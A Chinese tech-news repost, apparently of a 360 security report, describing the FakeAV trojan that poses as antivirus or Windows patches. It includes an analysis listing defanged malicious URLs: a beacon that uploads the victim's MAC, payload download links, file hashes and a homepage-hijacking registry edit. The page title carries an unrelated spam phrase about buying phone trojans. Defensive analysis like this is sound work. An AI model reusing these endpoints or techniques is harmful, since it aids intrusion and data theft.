您的位置:首页 > 互联网

“FakeAV木马”假冒杀毒软件行骗 暗中窃取网民数据_手机木马病毒购买平台

发布时间:2022-07-22 05:24:53  来源:互联网     背景:

  近日,360安全中心拦截到一批假冒杀毒软件及系统补丁的木马程序(FakeAV)。此类木马通过恶意网页伪造Windows弹窗,恐吓访问者电脑存在风险,借机将木马安插到网民电脑中。据分析,FakeAV木马具有篡改浏览器首页,收集和上传受害者信息,以及强制安装多款播放器等危害,网民可使用360安全卫士将其拦截查杀。

  安全机构研究报告表明,假冒杀毒软件的木马自从2006年开始流行,是国外十分猖獗的一种网络诈骗手段。Google数据显示,该类威胁已占据全部恶意软件的15%。就在不久前的6月份,美国警方联合欧洲7国执法部门破获一起假冒杀毒软件诈骗案,涉案金额超过7200万美元,而微软也曾专门为删除某款假冒杀毒软件发布补丁。

  根据360安全专家介绍,FakeAV木马之所以能够骗到不少网民,主要依靠网页动画制造出“电脑中毒”的假象。此前,一个名为“广告炸弹”的木马甚至设计出“电脑即将高温爆炸”的圈套,欺骗网民付费购买某款软件的注册码。如果网友将这类网页关闭,所有“中毒”现象都会不治自愈。

  专家提示,如果有网民电脑感染了FakeAV木马,应及时下载使用360安全卫士进行全盘扫描,以免个人重要数据被木马窃取。

  附:FakeAV木马分析

  一:不法分子首先通过论坛链接、电子邮件等方式将用户引导至hxxp://you-o.com/windows-safe/b.html,并弹出伪造“电脑中毒”现象的提示:

  点击确定后出现一个弹窗和下载链接,欺骗用户下载:

  该网页还会提示访问者修改主页:

  之后下载一个假冒Windows补丁的恶意程序(FakeAV木马):

  二、文件名为“Windowsxp-补丁kb20110807H.COM”的FakeAV木马运行后,搜集用户机器信息传送到服务器端,并暗中下载推广多款软件。

  l  获取机器MAC,和机器描述信息

  l  向网站

  hxxp://vip.yaqio.com:9999/Submit.php?id=1&action=inst&mac=00-0C-29-20-3A-7E&lockcode=-11413"提交用户的信息

  从hxxp://d.15587.com/ie.bmp将恶意软件暗中下载到临时目录

  下载结束,执行木马文件

  下载和执行,内含3个软件静默安装的推广包,也就是用户电脑中会莫名其妙的多出三个软件。

  "C:\Program Files\Kuping_s_8560.exe"

  hxxp://d.15587.com/Kuping_s_8560.exe

  hxxp://d.15587.com/FunshionInstall.exe

  hxxp://d.15587.com/PPTV(pplive)_forqiqi_0003exe.exe

  带有数字签名的静默安装包

  b7a97a6171210740279d499cb8fd5f1f  PPTV(pplive)_forqiqi_0003exe.exe

  bc908a9b1423916ad1407ba4a948ffe8  FunshionInstall_C107941.exe

  b668f13c4885db413666ef2a1a5dd912  Kuping_s_8560.exe

  三、Intel.exe执行分析

  创建命名管道执行CMD命令,设置文件属性。

  创建隐藏IE 打开https://15587.com/?run

  生成加密Media Update.vbe

  Media Update.vbe会用Intel.exe替换Outlook Express\msimn.exe

  修改主页hxxp://www.82021.com/?

  修改右键菜单:

  "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", "C:\Program Files\Internet Explorer\iexplore.exe https://www.82021.com//","REG_SZ"

  c430ec439ca3b48f1e33839a2852babf  Intel.exe

  c430ec439ca3b48f1e33839a2852babf  Masker.exe

诺基亚nokia10最新消息

ssl证书有免费的吗


杀木马病毒软件

魅蓝note5跑分

国美体验店


成都市移动互联网协会

redmi buds 3降噪

俞永福为什么不是阿里接班人

特斯拉 CarPlay

“手机监听卡”骗局兴起 360截获千家钓鱼网站
凡客掀“全民设计”热潮 将用户价值最大化

返回网站首页

本文评论
余额宝三季度赚27亿 成盈利超20亿元产品_余额宝三万收益
10月28日 消息:今年三季度,货币市场型基金成为最赚钱的基金品种。其中,余额宝成货币基金“吸金王”,三季度利润达27亿。罗德与施瓦茨网络分析仪Wind数据显示,2022年三季度基金利...
日期:10-31
分类有道,变废为宝!小黄狗环保科技深入珠海社区开展环保活动
  为进一步推进生活垃圾分类工作进展,提高居民垃圾分类意识和主动性,宣传资源再生、节约能源的环保理念,近日,在珠海市金湾区三灶镇城乡垃圾分类工作领导小组办公室指导下,三...
日期:08-18
计算机漏洞_英特尔再曝安全漏洞:黑客可窃取PC机密数据
  5月15日消息,据国外媒体报道,英特尔和一组安全研究人员在该公司处理器中新发现的一个安全漏洞,允许攻击者窃取处理器最近访问过的任何数据,甚至在云服务器上也是如此,这可能...
日期:12-22
360浏览器:安全与速度同行_360安全浏览器和极速浏览器
  360公司2011第二季度财报披露,360旗下安全浏览器第二季度用户渗透率再创新高,从今年第一季度末的48%上升到本季度末的52%,进一步拉开与国内其他浏览器厂商的距离。   据...
日期:07-23
苹果cpu领先安卓多少「安卓SoC性能终于站起来了!苹果A16处理器危矣」
本月,联发科天玑9200、高通骁龙8 Gen2将分别于11月8日和15日先后发布。预计最快月末,第一批换代的旗舰手机将陆续登场。最新爆料显示,至少就GPU性能而言,骁龙8 Gen2、天玑9200的...
日期:11-08
滴滴导航崩了,司机、我、我家在哪儿?(滴滴司机关掉导航)
  10月25日消息 今天下午7点有多位网友反映称“滴滴导航崩了”,相关话题也在短时间内迅速登上微博热搜。据悉,在滴滴导航出现故障期间主要体现为滴滴司机接单后在原地不动,...
日期:10-02
vivos6上架时间「vivo S16上架预约:三款机型 22日发布」
日前,vivo已经正式官宣,将在12月22日举行发布会,当天将会发布vivo S16系列手机,目前系列共有3款新机,包括vivo S16e、vivo S16、vivo S16 Pro三款机型,而目前vivo S16系列已经上架...
日期:12-18
买个电纸书,怎么老被“拔网线”?_帮我把网线给拔了
声明:本文来自于微信公众号 盒饭财经(ID:daxiongfan),作者:毕安娣,授权转载发布。又一个电纸书产品不干了,近期,QQ阅读电子书设备/口袋阅(以下简称“口袋阅”)宣布停运。在只有4778个成...
日期:10-06
支付变革与创新「经济日报:支付十年 数字化浪潮中的支付变迁」
  2013年,上海的张先生来到浦发银行的ATM机,他要给远在北京上学的小张转生活费。插卡、输入密码、转账、24小时后,小张的招商银行借记卡将收到这笔转账款项。  2017年,小张...
日期:09-28
Pinterest第二季度营收6.66亿美元 同比转盈为亏
物流行业问题印度 造假电动suv q5etron电动suv q5etron黑鲨5手机最新消息 查看最新行情   讯 北京时间8月2日凌晨消息,图片共享社交平台Pinterest今日公...
日期:08-03
镶嵌劳力士iPhone14 Pro售价93万,你不知道的这些手机都是10万起步
iPhone14Pro发售之后,著名的奢侈品牌凯威阿也推出了定制款,其中镶嵌劳力士iPhone14Pro售价93万,鱼子酱系列的iPhone14Pro全部都5万多元起售,金色香槟水晶版售价10万元起。域名被...
日期:10-10
谷歌旗舰影像得分出炉 小米12S Ultra_小米10谷歌相机对比
中关村在线消息:今日,知名评测机构DXO公布了谷歌旗舰手机Pixel 7的的影像得分,这台手机获得了140分的高分。值得一提的是,谷歌旗舰手机的得分比小米徕卡高端旗舰小米12S Ultra还...
日期:11-23
红米K60或为双旗舰!配置将吊打小米12_红米K60
中关村在线消息:10月8日,据相关爆料,即将在明年第一季度发布的红米K60系列新机详细参数已经曝光,新机将采用双旗舰策略,两款机型均采用旗舰芯片,标准版搭载高通骁龙8+,Pro搭载高通骁...
日期:10-16
快手推V-star虚拟人计划 百亿流量扶持虚拟人内容创作(快手虚拟人气)
8月16日消息,近日,从快手官方侧获悉,快手于近期推出了面向虚拟人内容扶持及孵化的V-star虚拟人计划。据悉,该计划旨在与合作伙伴共建行业生态标杆,将针对不同虚拟人账号情况定制...
日期:08-18
“在网上高调”不该成为被骚扰的理由_保证不再进行骚扰
2020年,美国恐怖片《隐形人》上映。影片的惊悚之处在于,女主角要对抗的恶行,明明证据确凿存在,却又隐匿于看不见的空气。对遭遇网络骚扰和威胁的受害者来说,想要拿起反击的武器,并...
日期:07-31
欧洲电视歌唱大赛指定利物浦为2023年主办城市「足球赛在英国的首都什么举行」
欧洲广播联盟(EBU)和英国广播公司(BBC)宣布,经过激烈的竞标,利物浦被选为第67届欧洲电视歌唱大赛的主办城市。披头士乐队的故乡将代表乌克兰主办第67届欧洲电视歌唱大赛。2023年...
日期:10-20
传微软收购诺基亚手机业务 后者澄清无根据
北京时间6月2日凌晨消息(蒋均牧)著名诺基亚追踪者、俄罗斯博主Eldar Murtazin暗示,微软已同意斥资190亿美元收购诺基亚手机业务。诺基亚发言人Doug Dawson随后澄清,称“这些传...
日期:07-28
小红书看上「老红书」「小红书买的」
声明:本文来自于微信公众号 壹娱观察(ID:yiyuguancha),作者:厚码,授权转载发布。“50岁+”,这一关键词正被中老年博主写进小红书的笔记里。现居深圳的“Angel Z”是一位53岁辣妈,...
日期:10-12
新产品遭泄密 百度统计或将提前推出“热力图”
  继百度统计力推收录量查询功能后,又一重大功能升级即将推出。近日,在一些聚集站长群体的论坛和社区里,一份名为百度统计“热力图”的图片被疯狂流传,虽然图片外表模糊,但仍...
日期:07-25
Skype发生宕机事故 故障波及全球用户_skype闪退什么原因
  据国外媒体报道,Skype于美国当地时间周四早晨发生宕机事故,故障波及全球用户。   据多名用户反映称,他们在登录和使用Skype拨打网络电话时出现问题,包括Mac、Windows、Li...
日期:07-28